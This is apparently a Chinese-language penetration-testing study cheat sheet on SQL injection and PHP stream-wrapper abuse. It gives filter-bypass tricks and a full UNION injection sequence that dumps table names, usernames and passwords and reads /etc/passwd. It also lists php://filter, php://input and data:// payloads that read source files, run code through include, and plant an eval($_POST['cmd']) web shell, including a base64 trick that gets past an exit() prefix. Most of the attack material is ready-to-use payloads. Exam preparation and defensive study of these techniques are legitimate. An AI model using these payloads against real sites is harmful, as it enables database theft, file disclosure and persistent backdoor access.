这里主要分享一些在PTE过程中遇到的知识点

SQL注入

基本样式

1	http://127.0.0.1/sql.php?id=1

绕过姿势

1.绕过空格

1
2
3

双写空格、tab替代空格
%0a %20 %09 %0b %0c %0d %a0 /**/
() 用括号将需要分隔的字符包裹

2.绕过注释符（#，–）

%23
末尾构造闭合
or '1'='1
and '1'='1

3.绕过关键字

注释符绕过
U/**/NION/**/SE/**/LECT/**/

大小写绕过
UnIoN/**/SeLeCT

双关键字绕过
UNIunionON/**/SeLselectECT

4.绕过and和or

1 2	anD anandd && \|\|

5.绕过=

like

联合注入

假如此时执行的语句为select * from article where id= ('1')，获取数据的方式如下

id=('1') order by 5#
-- 单引号闭合原先的语句，加上order by判断列数，#用于将原先语句中的')注释，使其后面的内容失效
-- 其中by后面的数字逐个尝试，直至出现报错信息为止，最终为出现报错信息前一个数字
-- 判断列数时需要用正确数据

id=('-1') union select 1,2,3,4,5#
-- 使用联合查询判断回显点，其中后面1，2，3为判断出来的列数
-- 使用联合查询时需要使用错误数据

id=('-1') union select 1,2,database(),4,5#
-- 假设3为回显点，将回显点替换为sql语句就能在界面上回显执行sql语句的结果

id=('-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database(),4,5#
-- 在回显点显示当前数据库所有的数据表名称，group_concat函数用于连接查询出来的数据表

id=('-1') union select 1,2,group_concat(0x7e,column_name,0x7e) from information_schema.columns where table_name='tablename',4,5#
-- 查询名称为tablename数据表中的列，并以~分割，结果示例：~id~,~username~,~password~

id=('-1') union select 1,2,group_concat(id,username,password) from tablename,4,5#
-- 查询tablename表中的id，username，password字段值

Tips
id=('-1') union select 1,2,load_file('/tmp/360/key'),4,5#
-- 可以使用函数load_file('/etc/passwd')读取文件内容

若 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database(),4,5# 不起作用，可以将from后的字符移到末尾，如：union select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=database()#

PHP伪协议

支持的伪协议

file:// # 访问本地文件系统
http:// # 访问 HTTP(s) 网址
ftp:// # 访问 FTP(s) URLs
php:// # 访问各个输入/输出流（I/O streams）
zlib:// # 压缩流
data:// # 数据（RFC 2397）
glob:// # 查找匹配的文件路径模式
phar:// # PHP 归档

php://

php://filter

php://filter可以获取指定文件源码。当它与包含函数结合时，php://filter流会被当作php文件执行。一般对其进行编码，让其不执行，从而导致任意文件读取

1 2	php://filter/read=convert.base64-encode/resource=index.php #base64方式读取 php://filter/resource=index.php

php://filter协议绕过死亡exit

# 死亡exit：在写入php代码时执行了以下函数
file_put_contents($filename, '<?php exit();?>' . $content);

# 插入一句话木马后
<?php exit();?>
<?php @eval($_POST['cmd']);?>

这样插入的一句话木马就不会被执行

当$content加上<?php exit();?>后，可以使用php://filter/write=convert.base64-decode对其绕过

由于base64编码中不包含,;<>()等特殊字符，因此<?php exit();?>会变为phpexit，但是base64编码为4byte一组，因此还需要加上任意一个字符组合，最终payload为

1
2

?filename=php://filter/convert.base64-decode/resource=1.php&content=aPD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs/Pg==
# 写入的文件名是1.php，内容为<?php eval($_POST['cmd']);?>[PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs/Pg==]

php://input

php://input可以访问请求的原始数据的只读流，将post请求的数据当作php代码执行。在enctype=”multipart/form-data”的时候，php://input是无效的

http://127.0.0.1/include.php?file=php://input

POST数据
<?php phpinfo();?>
# 写入一句话木马
<?php fputs(fopen('OneTrojan.php','w'),'<?php @eval($_POST['cmd']); ?>');?>

data://

数据流封装器，传递相应格式的数据。与文件包含函数（include，require，include_once，require_once）相结合时用来执行php代码

#include.php
<?php
if (isset($_GET[file])){
	$filename  = $_GET['file'];
	include($filename);
}else{
    echo "file";
}
?>

1 2	http://127.0.0.1/include.php?file=data://text/plain,<?php phpinfo();?> http://127.0.0.1/include.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b

file://

用于访问本地文件系统，并且不受allow_url_fopen，allow_url_include影响
主要用于访问文件（绝对路径、相对路径以及网络路径）

1	http://127.0.0.1?file=file:///etc/passwd